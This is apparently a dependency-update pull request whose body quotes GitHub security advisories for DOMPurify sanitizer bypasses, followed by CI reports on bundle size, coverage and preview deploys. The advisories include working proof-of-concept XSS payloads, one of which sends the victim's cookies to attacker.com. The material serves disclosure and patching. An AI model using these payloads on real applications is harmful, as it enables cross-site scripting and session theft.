src/purify.ts:527-531:

ALLOWED_TAGS =
  objectHasOwnProperty(cfg, 'ALLOWED_TAGS') &&
  arrayIsArray(cfg.ALLOWED_TAGS)
    ? addToSet({}, cfg.ALLOWED_TAGS, transformCaseFunc)
    : DEFAULT_ALLOWED_TAGS;            // [B] reference assignment; ALLOWED_TAGS
                                       //     IS the DEFAULT_ALLOWED_TAGS object

(The ALLOWED_ATTR = DEFAULT_ALLOWED_ATTR path at :532-536 is symmetric.)

The mismatch

A hook author who writes data.allowedTags['script'] = true reasonably expects per-call scope — the API name is "data", suggesting per-event payload. But [A] makes this a direct reference, and [B] makes that reference equal to the module-level default for the common default-cfg path. The hook's mutation therefore writes to a constant that every subsequent default-cfg sanitize call rebinds to.

The maintainer already recognized this class for the ADD_TAGS array path — src/purify.ts:696-700:

} else if (arrayIsArray(cfg.ADD_TAGS)) {
  if (ALLOWED_TAGS === DEFAULT_ALLOWED_TAGS) {
    ALLOWED_TAGS = clone(ALLOWED_TAGS);   // explicitly clone DEFAULT before
                                          // mutating to avoid this pollution
  }
  addToSet(ALLOWED_TAGS, cfg.ADD_TAGS, transformCaseFunc);
}

The same defensive clone is missing from the hook code paths.

Proof of concept

// 1) fresh DOMPurify, default config — script is blocked
DOMPurify.sanitize('<svg><script>alert(1)</script></svg>');
// → "<svg></svg>"

// 2) install a hook that mutates data.allowedTags (natural-looking pattern)
DOMPurify.addHook('uponSanitizeElement', (node, data) => {
  data.allowedTags['script'] = true;
});

// 3) one sanitize call WITH the hook — script survives (expected during the hook)
DOMPurify.sanitize('<svg><script>alert(1)</script></svg>');
// → "<svg><script>alert(1)</script></svg>"

// 4) remove the hook
DOMPurify.removeAllHooks();
DOMPurify.clearConfig();

// 5) sanitize attacker content with default config — POLLUTION PERSISTS
DOMPurify.sanitize('<svg><script>alert(1)</script></svg>');
// → "<svg><script>alert(1)</script></svg>"  ← script survived without any hook

// 6) the only recovery: create a fresh DOMPurify instance
const fresh = DOMPurify(window);
fresh.sanitize('<svg><script>alert(1)</script></svg>');
// → "<svg></svg>"  ← clean

Observed (Chromium 148.0.7778.96, DOMPurify HEAD 7996f1d):

step	input	output	bypass?
1 fresh baseline	<svg><script>__</script></svg>	<svg></svg>	no
1b fresh baseline	<a onclick=__>x</a>	<a>x</a>	no
2 with hook (script)	<svg><script>__</script></svg>	<svg><script>__</script></svg>	yes (expected)
2b with hook (onclick)	<a onclick=__>x</a>	<a onclick="__">x</a>	yes (expected)
3 after removeAllHooks()	same	<svg><script>__</script></svg>	YES (pollution)
3b after removeAllHooks()	same	<a onclick="__">x</a>	YES (pollution)
4 after clearConfig()	same	<svg><script>__</script></svg>	YES
4b after clearConfig()	same	<a onclick="__">x</a>	YES
5 explicit restrictive cfg.ALLOWED_TAGS=['svg']	same	<svg></svg>	no (cloned set)
6 back to no cfg	same	<svg><script>__</script></svg>	YES
6b back to no cfg	same	<a onclick="__">x</a>	YES
7 fresh DOMPurify(window) instance	same	<svg></svg>	no
7b fresh instance	<a onclick=__>x</a>	<a>x</a>	no

Impact

Direct

Any application using DOMPurify that has any registered hook with the pattern data.allowedTags[...] = true or data.allowedAttributes[...] = true. The hook need not be designed to be permissive — it might be intended to temporarily allow a custom tag for one specific element shape. After the hook has executed even once, every subsequent default-config sanitize call carries the widened defaults, including:

• attacker content rendered via separate code paths (e.g., the same library serving a comments section and a profile bio, where the bio uses the hook and the comments use plain DOMPurify.sanitize(text))
• third-party libraries that call DOMPurify.sanitize on the same instance

The bypass survives DOMPurify.removeAllHooks() and DOMPurify.clearConfig() — the obvious "reset" calls a dev would reach for. Detection requires reading the DEFAULT_ALLOWED_TAGS / DEFAULT_ALLOWED_ATTR sets directly, which are not part of the public API.

Indirect / second-order

• Editor / preview libraries that compose with DOMPurify — if any consumer registers a hook that mutates data.allowedTags, every other consumer's sanitize calls inherit the widening.
• Test suites that exercise multiple sanitize configurations — once a test's hook pollutes the defaults, later tests that assume default behavior may pass with widened defaults and miss real regressions.
• Long-running servers (SSR, edge functions) that reuse a single DOMPurify instance — pollution accumulates over the process lifetime.

Why the existing maintainer defense for ADD_TAGS doesn't catch this

src/purify.ts:696-700 already documents awareness:

} else if (arrayIsArray(cfg.ADD_TAGS)) {
  if (ALLOWED_TAGS === DEFAULT_ALLOWED_TAGS) {
    ALLOWED_TAGS = clone(ALLOWED_TAGS);
  }
  addToSet(ALLOWED_TAGS, cfg.ADD_TAGS, transformCaseFunc);
}

The clone-before-mutate pattern is exactly what's needed at the hook callsites (:1206-1209 and :1494-1500) but was not extended there. The new entries this report's bypass adds to the defaults survive the same way ADD_TAGS array entries would have survived before that fix landed.

Suggested fix

Three minimal-impact options, in order of preference:

1. Hand the hook a defensive copy (most surgical):

   _executeHooks(hooks.uponSanitizeElement, currentNode, {
     tagName,
     allowedTags: { ...ALLOWED_TAGS },     // shallow copy; mutations stay scoped
   });

   Doc note: "data.allowedTags is a snapshot; to widen the live set, use cfg.ADD_TAGS or set the value to true in the snapshot and check the snapshot from a subsequent attribute hook." Hooks that read it for inspection still work; hooks that intended cross-call mutation must be rewritten to use a proper config path (which is the correct API anyway).

2. Clone-on-write inside the hook path, mirroring the existing ADD_TAGS defense at :696-700: detect that ALLOWED_TAGS === DEFAULT_ALLOWED_TAGS after the hook returns, and if so, replace it with a clone for subsequent processing. This preserves the live-mutation semantics for in-call effects while preventing cross-call leakage.

3. Lazy-clone ALLOWED_TAGS/ALLOWED_ATTR from defaults on first mutation: install a Proxy or accessor that triggers a clone before mutation. Largest surface area, but bulletproof.

Option (1) is the cleanest API contract: hook event objects should be event-local, never references to library-internal state.

Severity

• CVSS Score: 6.1 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

References

• https://github.com/cure53/DOMPurify/security/advisories/GHSA-76mc-f452-cxcm
• https://github.com/advisories/GHSA-76mc-f452-cxcm

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

DOMPurify IN_PLACE Sanitization Bypass via Attached Shadow Root Inside .content

CVE-2026-49978 / GHSA-rp9w-3fw7-7cwq

More information

Details

If the HTML you give it contains a element, and inside that template there's an element with a shadow DOM attached to it, DOMPurify quietly skips over the shadow contents. Whatever the attacker put in there - an image with an onerror handler, a link with a javascript: URL, even a full script - survives untouched. The moment the application uses that template the way templates are meant to be used (cloning it and inserting the result into the page), the malicious payload comes along and runs as if it had never been sanitized. From there an attacker gets everything XSS normally gets them: session cookies, stored tokens, the ability to act as the user, and the ability to leave persistent payloads behind for the next person who visits.

advisory.pdf

poc.html

Severity

• CVSS Score: 5.1 / 10 (Medium)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

References

• https://github.com/cure53/DOMPurify/security/advisories/GHSA-rp9w-3fw7-7cwq
• https://github.com/advisories/GHSA-rp9w-3fw7-7cwq

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

DOMPurify: SAFE_FOR_TEMPLATES bypass - template expressions survive sanitization inside content when using DOM output modes

GHSA-gvmj-g25r-r7wr

More information

Details

Summary

When DOMPurify is configured with both SAFE_FOR_TEMPLATES: true and RETURN_DOM: true (or IN_PLACE: true), an attacker can inject template expressions, such as ${evil}, {{evil}}, or <%evil%>, that survive the sanitization pass inside <template> element content. This bypasses the explicit purpose of SAFE_FOR_TEMPLATES, which is to prevent template engine evaluation of user-supplied content.

Note: The string output path is not affected. Only the DOM return paths (RETURN_DOM: true, RETURN_DOM_FRAGMENT: true, IN_PLACE: true) are vulnerable.

---

Description

Background

SAFE_FOR_TEMPLATES is designed to strip {{ }}, ${ }, and <% %> expressions from sanitized output so that downstream template engines do not evaluate user-controlled content. The feature operates through two mechanisms:

1. Per-node scrubbing (_sanitizeElements, src/purify.ts:1403), scrubs individual text nodes during the main sanitization walk.
2. Final normalization pass (_scrubTemplateExpressions, src/purify.ts:1115), calls node.normalize() to merge adjacent text nodes, then walks the merged nodes and strips any expressions that only appeared after merging.

The Gap

_scrubTemplateExpressions uses a standard NodeIterator rooted at the output body:

// src/purify.ts:1117
const walker = createNodeIterator.call(
  node.ownerDocument || node,
  node,
  NodeFilter.SHOW_TEXT | NodeFilter.SHOW_COMMENT | ...,
  null
);

Per the DOM specification, a NodeIterator does not descend into <template>.content. The template element's content is a separate DocumentFragment that lives outside the normal child-node tree. For the same reason, node.normalize() (called on line 1116) also does not normalize text nodes inside <template>.content.

This means the final normalization and scrub pass, the only pass that catches expressions formed by merging split text nodes, never runs on <template> content.

How Split Text Nodes Are Created

When DOMPurify removes a disallowed element with KEEP_CONTENT: true (the default), it moves the element's text children into the parent node. This is the standard code path at src/purify.ts:1361–1373:

if (KEEP_CONTENT && !FORBID_CONTENTS[tagName]) {
  const parentNode = getParentNode(currentNode);
  const childNodes = getChildNodes(currentNode);
  if (childNodes && parentNode) {
    for (let i = childCount - 1; i >= 0; --i) {
      const childClone = cloneNode(childNodes[i], true);
      parentNode.insertBefore(childClone, getNextSibling(currentNode));
    }
  }
}

If the removed elements were adjacent siblings inside <template> content, their extracted text nodes end up as adjacent text nodes in the template content fragment. Each individual text node is scrubbed by _sanitizeElements, but since $ and {evil} do not match any expression regex on their own, neither is modified.

The code comment at src/purify.ts:1100 explicitly acknowledges the threat class:

"which only form after text-node normalization (e.g. fragments split across stripped elements) cannot survive into a template-evaluating framework."

The implementation guards against this on the main body, but the guard is not applied to <template> content.

---

Proof of Concept

Why the Split Works

The bypass relies on splitting ${...} across two adjacent custom elements so that neither fragment matches any DOMPurify regex on its own:

Fragment	Against TMPLIT_EXPR /\${[\w\W]*/g	Against MUSTACHE_EXPR /{{[\w\W]*|^[\w\W]*}}/g	Result
$	Requires ${ - no { follows	No {{ or }}	Survives
{alert(document.domain)}	Requires leading $ - absent	No {{, ends with single } not }}	Survives
${alert(document.domain)}	Full match - would be stripped	-	Stripped if seen whole

DOMPurify only sees each fragment in isolation. It never merges them before checking, so the expression is never detected.

---

PoC 1 - XSS via alert() (baseline confirmation)

// Attacker input - splits "${alert(document.domain)}" across two custom elements.
// Custom elements are not in DOMPurify's default ALLOWED_TAGS and are removed,
// but their text content is kept (KEEP_CONTENT: true is the default).
const dirty =
  '<template>' +
    '<x-split-1>$</x-split-1>' +
    '<x-split-2>{alert(document.domain)}</x-split-2>' +
  '</template>';

// Developer sanitizes with SAFE_FOR_TEMPLATES, trusting it strips ${...}
const sanitized = DOMPurify.sanitize(dirty, {
  RETURN_DOM: true,
  SAFE_FOR_TEMPLATES: true,
});

// Inspect what survived inside the <template>
const tmpl = sanitized.querySelector('template');
console.log([...tmpl.content.childNodes].map(n => n.nodeValue));
// ["$", "{alert(document.domain)}"]  <-- two separate text nodes, both "clean"

// Frameworks (lit-html, Angular, custom renderers) routinely call normalize()
// before reading template content. This merges the adjacent nodes:
tmpl.content.normalize();
console.log(tmpl.content.textContent);
// "${alert(document.domain)}"  <-- fully formed expression, past the sanitizer

// Any template-literal evaluator now fires XSS:
const expr = tmpl.content.textContent;
new Function(`return \`${expr}\``)();
// !! alert(document.domain) executes !!

---

PoC 2 - Session Hijacking via cookie exfiltration

// Splits "${document.location='//attacker.com/?c='+document.cookie}"
// "{document.location=...}" ends with a single "}" — does NOT match
// MUSTACHE_EXPR's "^[\w\W]*}}" (requires double "}}"), so it survives.
const dirty =
  '<template>' +
    '<x-a>$</x-a>' +
    '<x-b>{document.location="//attacker.com/?c="+document.cookie}</x-b>' +
  '</template>';

const sanitized = DOMPurify.sanitize(dirty, {
  RETURN_DOM: true,
  SAFE_FOR_TEMPLATES: true,
});

const tmpl = sanitized.querySelector('template');
tmpl.content.normalize();

console.log(tmpl.content.textContent);
// "${document.location="//attacker.com/?c="+document.cookie}"

// Template engine evaluates it - victim's browser makes the request:
new Function(`return \`${tmpl.content.textContent}\``)();
// !! Redirects victim to attacker.com with their full cookie string !!
// e.g. https://attacker.com/?c=session=abc123;auth_token=xyz789

---

PoC 3 - End-to-end: realistic application context

This shows the full path in an application that uses DOMPurify to sanitize user-submitted rich text before rendering it with a custom template engine:

<!-- index.html - the vulnerable application -->
<div id="output"></div>
<script type="module">
  import DOMPurify from './dist/purify.es.mjs';

  // Simulates fetching and rendering user-submitted comment
  async function renderComment(userHtml) {
    // Developer correctly uses SAFE_FOR_TEMPLATES to protect the template engine
    const dom = DOMPurify.sanitize(userHtml, {
      RETURN_DOM: true,
      SAFE_FOR_TEMPLATES: true,
    });

    // Application iterates <template> elements and evaluates their content
    // (common pattern in component-based frameworks)
    dom.querySelectorAll('template').forEach(tmpl 

> ✂ **Note**
> 
> PR body was truncated to here.

[github-actions]

📦 Bundle Size Report

Metric	Current	Previous	Change	Status
Total (gzip)	220.84 kB	220.84 kB	0 B (0%)	🟢
Total (raw)	595.28 kB	595.28 kB	0 B (0%)	🟢
CSS (gzip)	20.89 kB	20.89 kB	0 B (0%)	🟢
CSS (raw)	109.09 kB	109.09 kB	0 B (0%)	🟢

Size Limits

• ✅ Total gzipped: 220.84 kB / 250 kB (88.3%)
• ✅ Total raw: 595.28 kB / 600 kB (99.2%)
• ✅ CSS gzipped: 20.89 kB / 25 kB (83.5%)

Largest Files (Top 5)

1. chunk-Y3CJRZLA.js - 14 kB (0 B (0%))
2. styles.css - 10.44 kB (0 B (0%))
3. index.css - 10.44 kB (0 B (0%))
4. chunk-QN4ONV3W.js - 6.36 kB (0 B (0%))
5. index.js - 6.29 kB (0 B (0%))

View All Files (337 total)

File	Size (gzip)	Change
chunk-Y3CJRZLA.js	14 kB	0 B (0%)
styles.css	10.44 kB	0 B (0%)
index.css	10.44 kB	0 B (0%)
chunk-QN4ONV3W.js	6.36 kB	0 B (0%)
index.js	6.29 kB	0 B (0%)
chunk-M7QPV7VS.js	6.03 kB	0 B (0%)
chunk-G2LZFGZA.js	5.31 kB	0 B (0%)
chunk-K4VSUMEK.js	4.76 kB	0 B (0%)
chunk-7H7ZIQ4Z.js	4.49 kB	0 B (0%)
chunk-NMCYAKUO.js	3.89 kB	0 B (0%)

✅ Bundle size check passed

[github-actions]

📊 Coverage Report

⚪ Coverage unchanged

Metric	Current	Previous	Change	Status
Lines	88.41%	88.41%	0%	⚪
Statements	87.81%	87.81%	0%	⚪
Functions	84.87%	84.87%	0%	⚪
Branches	79.66%	79.66%	0%	⚪

Detailed Breakdown

Lines Coverage

• Covered: 3806 / 4305
• Coverage: 88.41%
• Change: 0% (0 lines)

Statements Coverage

• Covered: 3868 / 4405
• Coverage: 87.81%
• Change: 0% (0 statements)

Functions Coverage

• Covered: 1032 / 1216
• Coverage: 84.87%
• Change: 0% (0 functions)

Branches Coverage

• Covered: 2377 / 2984
• Coverage: 79.66%
• Change: 0% (0 branches)

✅ Coverage check passed

[github-actions]

Deploy preview for adp-cost-calculator ready!

Project:	adp-cost-calculator
Status:	✅  Deploy successful!
Preview URL:	https://adp-cost-calculator-hk43fw5f8-remotecom.vercel.app
Latest Commit:	7268480

Deployed with vercel-action

[github-actions]

Deploy preview for remote-flows ready!

Project:	remote-flows
Status:	✅  Deploy successful!
Preview URL:	https://remote-flows-bdpz3oaza-remotecom.vercel.app
Latest Commit:	7268480

Deployed with vercel-action